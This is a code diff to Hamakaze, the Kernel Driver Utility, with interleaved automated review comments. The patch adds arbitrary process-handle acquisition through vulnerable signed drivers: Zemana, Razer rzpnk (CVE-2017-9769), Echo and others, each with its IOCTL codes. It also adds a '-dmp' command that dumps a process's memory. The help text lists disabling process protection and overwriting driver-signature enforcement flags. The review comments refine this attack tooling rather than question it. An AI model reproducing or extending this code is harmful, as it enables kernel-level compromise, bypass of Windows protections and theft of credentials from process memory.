+* DATE: 20 Oct 2023
*
* Razer Overlay Support driver interface header.
*
@@ -20,51 +20,23 @@
#pragma once
//
-// Razer Overlay Support driver interface for CVE-2017-9769, CVE-2017-9770.
+// Razer Overlay Support driver interface for CVE-2017-9769.
//
-#define RAZER_DEVICE_TYPE 0x00000022 //DEVICE_TYPE_UNKNOWN
+#define RAZER_DEVICE_TYPE FILE_DEVICE_UNKNOWN
#define RAZER_OPEN_PROCESS_FUNCID (DWORD)0x814
-#define RAZER_MAP_SECTION_FUNCID (DWORD)0x819
-#define IOCTL_RZPNK_OPEN_PROCESS CTL_CODE(RAZER_DEVICE_TYPE, RAZER_OPEN_PROCESS_FUNCID, METHOD_BUFFERED, FILE_WRITE_ACCESS) //0x22A050
-#define IOCTL_RZPNK_MAP_SECTION_USER_MODE CTL_CODE(RAZER_DEVICE_TYPE, RAZER_MAP_SECTION_FUNCID, METHOD_BUFFERED, FILE_WRITE_ACCESS) //0x22A064
-
-#define SYSTEM_PID_MAGIC 4
-#define SYSTEM_USER_TO_KERNEL_HANDLE 0xffffffff80000000
+#define IOCTL_RZPNK_OPEN_PROCESS \
+ CTL_CODE(RAZER_DEVICE_TYPE, RAZER_OPEN_PROCESS_FUNCID, METHOD_BUFFERED, FILE_WRITE_ACCESS) //0x22A050
typedef struct _RAZER_OPEN_PROCESS {
HANDLE ProcessId;
HANDLE ProcessHandle;
} RAZER_OPEN_PROCESS, * PRAZER_OPEN_PROCESS;
-#pragma warning(push)
-#pragma warning(disable:4324) // structure padded due to __declspec(align())
-typedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT)_RAZER_MAP_SECTION_INFO {
- HANDLE ProcessHandle;
- HANDLE ProcessId;
- HANDLE SectionHandle;
- PVOID MappedBaseAddress;
- ULONG ViewCommitSize; //WARNING, cannot map above 4GB
- NTSTATUS Status;
-} RAZER_MAP_SECTION_INFO, * PRAZER_MAP_SECTION_INFO;
-#pragma warning(pop)
-
-BOOL WINAPI RazerRegisterDriver(
- _In_ HANDLE DeviceHandle);
-
-BOOL WINAPI RazerUnregisterDriver(
- _In_ HANDLE DeviceHandle);
-
-BOOL WINAPI RazerReadPhysicalMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _In_ PVOID Buffer,
- _In_ ULONG NumberOfBytes);
-
-BOOL WINAPI RazerWritePhysicalMemory(
+BOOL WINAPI RazerOpenProcess(
_In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
- _In_ ULONG NumberOfBytes);
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/zemana.cpp b/Source/Hamakaze/idrv/zemana.cpp
index beef4b7..869cdc9 100644
--- a/Source/Hamakaze/idrv/zemana.cpp
+++ b/Source/Hamakaze/idrv/zemana.cpp
@@ -4,9 +4,9 @@
*
* TITLE: ZEMANA.CPP
*
-* VERSION: 1.30
+* VERSION: 1.40
*
-* DATE: 20 Mar 2023
+* DATE: 20 Oct 2023
*
* Zemana driver routines.
*
@@ -524,6 +524,32 @@ BOOL ZmControlDSE(
return bResult;
}
+/*
+* ZmOpenProcess
+*
+* Purpose:
+*
+* Open process via Zemana driver.
+*
+*/
+BOOL WINAPI ZmOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle)
+{
+ UNREFERENCED_PARAMETER(DesiredAccess);
+
+ *ProcessHandle = NULL;
+
+ return supCallDriver(DeviceHandle,
+ IOCTL_ZEMANA_OPEN_PROCESS,
+ &ProcessId,
+ sizeof(ProcessId),
+ ProcessHandle,
+ sizeof(ProcessHandle));
+}
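Review bot: The output length passed by ZmOpenProcess is `sizeof(ProcessHandle)`, the size of the PHANDLE pointer rather than of the HANDLE it points to; both are 8 bytes on x64 so it happens to work, but the intent is `sizeof(*ProcessHandle)`. Likewise the input is the full 8-byte `ProcessId` HANDLE while the Binalyze and Echo providers in this change pass a 32-bit PID — if the Zemana driver reads only a ULONG this is fine on little-endian, but a comment stating which width the driver expects would help. The up-front `*ProcessHandle = NULL` is the right pattern and is the one the other new OpenProcess routines should follow.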
+
/*
* ZmRegisterDriver
*
diff --git a/Source/Hamakaze/idrv/zemana.h b/Source/Hamakaze/idrv/zemana.h
index 8d2bdc2..8403499 100644
--- a/Source/Hamakaze/idrv/zemana.h
+++ b/Source/Hamakaze/idrv/zemana.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: ZEMANA.H
*
-* VERSION: 1.27
+* VERSION: 1.40
*
-* DATE: 08 Nov 2022
+* DATE: 20 Oct 2023
*
* Zemana driver interface header.
*
@@ -34,6 +34,7 @@
#define ZEMANA_SCSI_WRITE (DWORD)0x806
#define ZEMANA_PROTECT_REGISTRY (DWORD)0x810
#define ZEMANA_SAVE_MINIPORT_FIX (DWORD)0x811
+#define ZEMANA_OPEN_PROCESS (DWORD)0x813
#define IOCTL_ZEMANA_REGISTER_PROCESS \
CTL_CODE(FILE_DEVICE_ZEMANA, ZEMANA_REGISTER_PROCESS, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80002010
@@ -50,6 +51,9 @@
#define IOCTL_ZEMANA_PROTECT_REGISTRY \
CTL_CODE(FILE_DEVICE_ZEMANA, ZEMANA_PROTECT_REGISTRY, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80002040
+#define IOCTL_ZEMANA_OPEN_PROCESS \
+ CTL_CODE(FILE_DEVICE_ZEMANA, ZEMANA_OPEN_PROCESS, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x8000204C
+
BOOL ZmMapDriver(
_In_ PKDU_CONTEXT Context,
_In_ PVOID ImageBase);
@@ -59,6 +63,12 @@ BOOL ZmControlDSE(
_In_ ULONG DSEValue,
_In_ ULONG_PTR Address);
+BOOL WINAPI ZmOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
+
BOOL WINAPI ZmRegisterDriver(
_In_ HANDLE DeviceHandle,
_In_opt_ PVOID Param);
diff --git a/Source/Hamakaze/kduplist.h b/Source/Hamakaze/kduplist.h
index 0d5227d..3f4ef19 100644
--- a/Source/Hamakaze/kduplist.h
+++ b/Source/Hamakaze/kduplist.h
@@ -4,9 +4,9 @@
*
* TITLE: KDUPLIST.H
*
-* VERSION: 1.34
+* VERSION: 1.40
*
-* DATE: 16 Sep 2023
+* DATE: 21 Oct 2023
*
* Providers global list.
*
@@ -45,6 +45,8 @@
#include "idrv/zodiacon.h"
#include "idrv/echodrv.h"
#include "idrv/nvidia.h"
+#include "idrv/binalyze.h"
+#include "idrv/rzpnk.h"
//
// Victims public array.
@@ -108,7 +110,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -132,7 +136,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -156,7 +162,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)MapMemReadPhysicalMemory,
(provWritePhysicalMemory)MapMemWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -180,7 +188,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)AtszioReadPhysicalMemory,
(provWritePhysicalMemory)AtszioWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -204,7 +214,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -228,7 +240,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -252,7 +266,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -276,7 +292,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WRZeroReadPhysicalMemory,
(provWritePhysicalMemory)WRZeroWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -300,7 +318,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -324,7 +344,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -348,7 +370,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)PhyMemReadPhysicalMemory,
(provWritePhysicalMemory)PhyMemWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -372,7 +396,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -396,7 +422,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)LHAReadPhysicalMemory,
(provWritePhysicalMemory)LHAWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -420,7 +448,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -444,7 +474,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)DI64ReadPhysicalMemory,
(provWritePhysicalMemory)DI64WritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -468,7 +500,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -492,7 +526,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -516,7 +552,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -540,7 +578,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)KphReadPhysicalMemory,
(provWritePhysicalMemory)KphWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)KphOpenProcess
},
{
@@ -564,7 +604,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)PexReadPhysicalMemory,
(provWritePhysicalMemory)PexWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)PexOpenProcess
},
{
@@ -588,7 +630,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -612,7 +656,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)DbkOpenProcess
},
{
@@ -636,7 +682,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -660,7 +708,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)HwReadPhysicalMemory,
(provWritePhysicalMemory)HwWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -684,7 +734,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)MapMemReadPhysicalMemory,
(provWritePhysicalMemory)MapMemWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -708,7 +760,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)ZmOpenProcess
},
{
@@ -732,7 +786,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -756,7 +812,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)DI64ReadPhysicalMemory,
(provWritePhysicalMemory)DI64WritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -780,7 +838,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)AsrReadPhysicalMemory,
(provWritePhysicalMemory)AsrWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -804,7 +864,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)AlcReadPhysicalMemory,
(provWritePhysicalMemory)AlcWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -828,7 +890,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)RmReadPhysicalMemory,
(provWritePhysicalMemory)RmWritePhysicalMemory,
- (provValidatePrerequisites)RmValidatePrerequisites
+ (provValidatePrerequisites)RmValidatePrerequisites,
+
+ (provOpenProcess)NULL
},
{
@@ -852,7 +916,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)PhmReadPhysicalMemory,
(provWritePhysicalMemory)PhmWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -876,7 +942,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)LddReadWritePhysicalMemoryStub,
(provWritePhysicalMemory)LddReadWritePhysicalMemoryStub,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -900,7 +968,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)DpdReadPhysicalMemory,
(provWritePhysicalMemory)DpdWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -924,7 +994,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -948,7 +1020,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -972,7 +1046,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -996,7 +1072,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)ZdcReadPhysicalMemory,
(provWritePhysicalMemory)ZdcWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -1020,7 +1098,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)ZdcReadPhysicalMemory,
(provWritePhysicalMemory)ZdcWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -1044,7 +1124,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)EchoDrvOpenProcess
},
{
@@ -1068,6 +1150,88 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NvoReadPhysicalMemory,
(provWritePhysicalMemory)NvoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
+ },
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)KDUProvStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)NULL,
+ (provUnregisterDriver)NULL,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)NULL,
+ (provMapDriver)NULL,
+ (provControlDSE)NULL,
+
+ (provReadKernelVM)NULL,
+ (provWriteKernelVM)NULL,
+
+ (provVirtualToPhysical)NULL,
+ (provQueryPML4)NULL,
+ (provReadPhysicalMemory)NULL,
+ (provWritePhysicalMemory)NULL,
+
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)BeDrvOpenProcess
+ },
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)KDUProvStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)NULL,
+ (provUnregisterDriver)NULL,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)KDUProviderPostOpen,
+ (provMapDriver)KDUMapDriver,
+ (provControlDSE)KDUControlDSE2,
+
+ (provReadKernelVM)NULL,
+ (provWriteKernelVM)NULL,
+
+ (provVirtualToPhysical)NULL,
+ (provQueryPML4)NULL,
+ (provReadPhysicalMemory)WRZeroReadPhysicalMemory,
+ (provWritePhysicalMemory)WRZeroWritePhysicalMemory,
+
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
+ },
+
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)KDUProvStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)NULL,
+ (provUnregisterDriver)NULL,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)NULL,
+ (provMapDriver)NULL,
+ (provControlDSE)NULL,
+
+ (provReadKernelVM)NULL,
+ (provWriteKernelVM)NULL,
+
+ (provVirtualToPhysical)NULL,
+ (provQueryPML4)NULL,
+ (provReadPhysicalMemory)NULL,
+ (provWritePhysicalMemory)NULL,
+
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)RazerOpenProcess
}
+
};
diff --git a/Source/Hamakaze/kduprov.cpp b/Source/Hamakaze/kduprov.cpp
index 5dfa808..6e02f10 100644
--- a/Source/Hamakaze/kduprov.cpp
+++ b/Source/Hamakaze/kduprov.cpp
@@ -4,9 +4,9 @@
*
* TITLE: KDUPROV.CPP
*
-* VERSION: 1.31
+* VERSION: 1.40
*
-* DATE: 09 Apr 2023
+* DATE: 21 Oct 2023
*
* Vulnerable drivers provider abstraction layer.
*
@@ -189,42 +189,48 @@ VOID KDUProvList()
//
// List provider flags.
//
+ if (provData->Flags)
+ printf_s("\tProvider capabilities: \r\n");
+
if (provData->SignatureWHQL)
- printf_s("\tDriver is WHQL signed\r\n");
+ printf_s("\t->Driver is WHQL signed.\r\n");
//
// Some Realtek drivers are digitally signed
// after binary modification with wrong PE checksum as result.
// Note: Windows 7 will not allow their load.
//
if (provData->IgnoreChecksum)
- printf_s("\tIgnore invalid image checksum\r\n");
+ printf_s("\t->Ignore invalid image checksum.\r\n");
//
// Some BIOS flashing drivers does not support unload.
//
if (provData->NoUnloadSupported)
- printf_s("\tDriver does not support unload procedure\r\n");
+ printf_s("\t->Driver does not support unload procedure.\r\n");
if (provData->PML4FromLowStub)
- printf_s("\tVirtual to physical addresses translation require PML4 query from low stub\r\n");
+ printf_s("\t->Virtual to physical addresses translation require PML4 query from low stub.\r\n");
if (provData->NoVictim)
- printf_s("\tNo victim required\r\n");
+ printf_s("\t->No victim required.\r\n");
if (provData->PhysMemoryBruteForce)
- printf_s("\tProvider supports only physical memory brute-force.\r\n");
+ printf_s("\t->Provider supports only physical memory brute-force.\r\n");
if (provData->PreferPhysical)
- printf_s("\tPhysical memory access is preferred.\r\n");
+ printf_s("\t->Physical memory access is preferred.\r\n");
if (provData->PreferVirtual)
- printf_s("\tVirtual memory access is preferred.\r\n");
+ printf_s("\t->Virtual memory access is preferred.\r\n");
if (provData->CompanionRequired)
- printf_s("\tProvider expects companion to be loaded.\r\n");
+ printf_s("\t->Provider expects companion to be loaded.\r\n");
if (provData->UseSymbols)
- printf_s("\tMS symbols are required to query internal information.\r\n");
+ printf_s("\t->MS symbols are required to query internal information.\r\n");
+
+ if (provData->OpenProcessSupported)
+ printf_s("\t->Driver can be used to open a handle for the specified process.\r\n");
//
// List "based" flags.
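Review bot: The header string added at the top of the hunk, `\tProvider capabilities: \r\n`, carries a trailing space before the line break; `printf_s("\tProvider capabilities:\r\n");` prints the same heading cleanly. The heading is also gated on the whole `provData->Flags` word while every line under it is gated on a single bit, so a flag bit with no matching printf_s would produce an empty heading — harmless as long as every bit is listed, but a one-line comment such as `// keep in sync with the flag bits printed below` makes the coupling explicit. The loop in KDUProvList that encloses this block starts before the hunk.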
@@ -725,6 +731,40 @@ BOOL WINAPI KDUWriteKernelVM(
return bResult;
}
+/*
+* KDUOpenProcess
+*
+* Purpose:
+*
+* Provider wrapper for OpenProcess routine.
+*
+*/
+_Success_(return != FALSE)
+BOOL WINAPI KDUOpenProcess(
+ _In_ struct _KDU_CONTEXT* Context,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle
+)
+{
+ BOOL bResult = FALSE;
+ KDU_PROVIDER* prov = Context->Provider;
+
+ __try {
+
+ bResult = prov->Callbacks.OpenProcess(Context->DeviceHandle,
+ ProcessId,
+ DesiredAccess,
+ ProcessHandle);
+
+ }
+ __except (EXCEPTION_EXECUTE_HANDLER) {
+ SetLastError(GetExceptionCode());
+ return FALSE;
+ }
+ return bResult;
+}
+
/*
* KDUProviderLoadDB
*
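Review bot: `prov->Callbacks.OpenProcess` is invoked without a NULL check; the only guard is the ActionTypeDumpProcess case in KDUProviderVerifyActionType, yet KDUOpenProcess is exported through kduprov.h, so any other caller on a provider whose slot is NULL lands in the __except handler with an access-violation code in last-error instead of a meaningful failure. An explicit guard is cheap: `if (prov->Callbacks.OpenProcess == NULL) { SetLastError(ERROR_NOT_SUPPORTED); return FALSE; }` before the __try. If the other provider wrappers in this file follow the same unguarded pattern, the guard is best added to them consistently rather than only here.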
@@ -844,6 +884,18 @@ BOOL KDUProviderVerifyActionType(
break;
+ case ActionTypeDumpProcess:
+
+ if (Provider->Callbacks.OpenProcess == NULL) {
+
+ supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary process handle acquisition or\r\n"\
+ "\tKDU interface is not implemented for this method.\r\n");
+ return FALSE;
+
+ }
+
+ break;
+
default:
break;
}
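Review bot: The gate for ActionTypeDumpProcess checks only `Provider->Callbacks.OpenProcess`, while the capability shown to the user by KDUProvList is the separate `OpenProcessSupported` DB flag, so the two can drift apart silently — a provider advertised as capable would still be rejected here with a message that never mentions the flag. If the provider structure gives access to its DB entry, consider checking that the flag and the callback agree (at load time or here) and naming the flag in the abort message; otherwise a comment such as `// the callback pointer, not the OpenProcessSupported DB flag, is authoritative` documents which one wins. The enclosing switch in KDUProviderVerifyActionType starts before this hunk.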
diff --git a/Source/Hamakaze/kduprov.h b/Source/Hamakaze/kduprov.h
index 255d4ff..1e98be7 100644
--- a/Source/Hamakaze/kduprov.h
+++ b/Source/Hamakaze/kduprov.h
@@ -4,9 +4,9 @@
*
* TITLE: KDUPROV.H
*
-* VERSION: 1.30
+* VERSION: 1.40
*
-* DATE: 20 Mar 2023
+* DATE: 21 Oct 2023
*
* Provider support routines.
*
@@ -136,11 +136,22 @@ typedef BOOL(WINAPI* provValidatePrerequisites)(
_In_ struct _KDU_CONTEXT* Context
);
+//
+// Prototype for process handle acquisition.
+//
+typedef BOOL(WINAPI* provOpenProcess)(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle
+ );
+
typedef enum _KDU_ACTION_TYPE {
ActionTypeMapDriver = 0,
- ActionTypeDKOM = 1,
- ActionTypeDSECorruption = 2,
- ActionTypeUnspecified = 3,
+ ActionTypeDKOM,
+ ActionTypeDSECorruption,
+ ActionTypeDumpProcess,
+ ActionTypeUnspecified,
ActionTypeMax
} KDU_ACTION_TYPE;
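Review bot: The enumerators lose their explicit values and `ActionTypeDumpProcess` is inserted in the middle, so `ActionTypeUnspecified` silently changes from 3 to 4 and `ActionTypeMax` from 4 to 5. That is harmless if KDU_ACTION_TYPE never leaves the process, but if the value is logged numerically, persisted, or compared by another component the renumbering is a behaviour change the diff does not mention. Keeping the numbers explicit, `ActionTypeDumpProcess = 3,` / `ActionTypeUnspecified = 4,`, or appending the new member just before ActionTypeMax, makes the intent visible to the next reader.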
@@ -173,6 +184,8 @@ typedef struct _KDU_PROVIDER {
provValidatePrerequisites ValidatePrerequisites; //optional
+ provOpenProcess OpenProcess; //optional
+
} Callbacks;
} KDU_PROVIDER, * PKDU_PROVIDER;
@@ -256,6 +269,13 @@ BOOL WINAPI KDUWriteKernelVM(
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
+_Success_(return != FALSE)
+BOOL WINAPI KDUOpenProcess(
+ _In_ struct _KDU_CONTEXT* Context,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
+
BOOL WINAPI KDUProviderStub(
VOID);
diff --git a/Source/Hamakaze/main.cpp b/Source/Hamakaze/main.cpp
index 855cb31..d9481ef 100644
--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -4,9 +4,9 @@
*
* TITLE: MAIN.CPP
*
-* VERSION: 1.34
+* VERSION: 1.40
*
-* DATE: 16 Sep 2023
+* DATE: 20 Oct 2023
*
* Hamakaze main logic and entrypoint.
*
@@ -24,6 +24,7 @@
#define CMD_SCV L"-scv"
#define CMD_PS L"-ps"
#define CMD_PSE L"-pse"
+#define CMD_DMP L"-dmp"
#define CMD_DSE L"-dse"
#define CMD_LIST L"-list"
#define CMD_SI L"-diag"
@@ -40,6 +41,7 @@
"kdu -diag - Run system diagnostic for troubleshooting\r\n"\
"kdu -prv id - Optional, sets provider id to be used with rest of commands, default 0\r\n"\
"kdu -pse cmdline - Launch program as PPL\r\n"\
+ "kdu -dmp pid - Dump virtual memory of the given process\r\n"\
"kdu -ps pid - Disable ProtectedProcess for given pid\r\n"\
"kdu -dse value - Write user defined value to the system DSE state flags\r\n"\
